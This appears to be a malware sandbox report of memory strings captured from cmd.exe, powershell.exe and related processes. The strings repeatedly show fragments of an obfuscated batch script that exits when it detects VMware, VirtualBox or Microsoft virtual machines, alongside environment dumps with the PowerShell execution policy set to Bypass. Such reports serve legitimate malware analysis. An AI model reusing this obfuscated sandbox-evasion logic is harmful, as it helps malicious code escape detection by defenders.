Source: cmd.exe, 0000000B.00000003.1410428938.000002C1DCA52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: RVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=mdd
Source: cmd.exe, 0000000B.00000003.1425656707.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=oXX
Source: cvtres.exe, 00000020.00000002.1489212522.0000021DA0080000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%pRRskkyxH%TxdoRBmbqzyDVqyq%PgoZqotPpEsJcYkgv%oIMCIYPcwKpRXwK%hZOpTayxjdmkYSTjwD%isoMMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit n=cn1=Cnumber_of_processors=2o=do1=Donedrive=C:\Users\user\OneDriveos=Windows_NTp=ep1=Epath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;pathext=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLprocessor_architecture=AMD64processor_identifier=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelprocessor_level=6processor_revision=8f08programdata=C:\ProgramDataprogramfiles=C:\Program Filesprogramfiles(x86)=C:\Program Files (x86)programw6432=C:\Program Filesprompt=$P$Gpsexecutionpolicypreference=Bypasspsmodulepath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXpublic=C:\Users\Publicq=fq1=Fr=gr1=Gs=hs1=Hsessionname=Consolesystemdrive=C:systemroot=C:\Windowst=it1=Itemp=C:\Users\user~1\AppData\Local\Temptmp=C:\Users\user~1\AppData\Local\Tempu=ju1=Juserdomain=user-PCuserdomain_roamingprofile=user-PCusername=useruserprofile=C:\Users\userv=kv1=Kw=lw1=Lwindir=C:\Windowsx=mx1=My=ny1=Nz=oz1=O_clrrestrictsecattributes=1
Source: cmd.exe, 0000000B.00000003.1414085671.000002C1DCA52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: YkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=ob
Source: cmd.exe, 0000000B.00000003.1438526569.000002C1DCA52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=OPP
Source: cmd.exe, 0000000B.00000003.1418280811.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o]]
Source: cmd.exe, 0000000B.00000003.1410428938.000002C1DCA52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=mlAy
Source: powershell.exe, 00000029.00000002.1870747846.000000C00000A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: \nif "%pRRskkyxH%TxdoRBmbqzyDVqyq%PgoZqotPpEsJcYkgv%oIMCIYPcwKpRXwK%hZOpTayxjdmkYSTjwD%isoMMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit manufacturer=%MGubyRKD%YrqpSyKTslhbH6rKmFa 158
Source: ReAgentc.exe, 00000037.00000002.1673373120.000001579F776000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:h
Source: cmd.exe, 0000000B.00000003.1410428938.000002C1DCA52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=mw
Source: cmd.exe, 0000000B.00000003.1445096751.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=OI
Source: cmd.exe, 0000000B.00000003.1416796112.000002C1DCA52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: BggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files 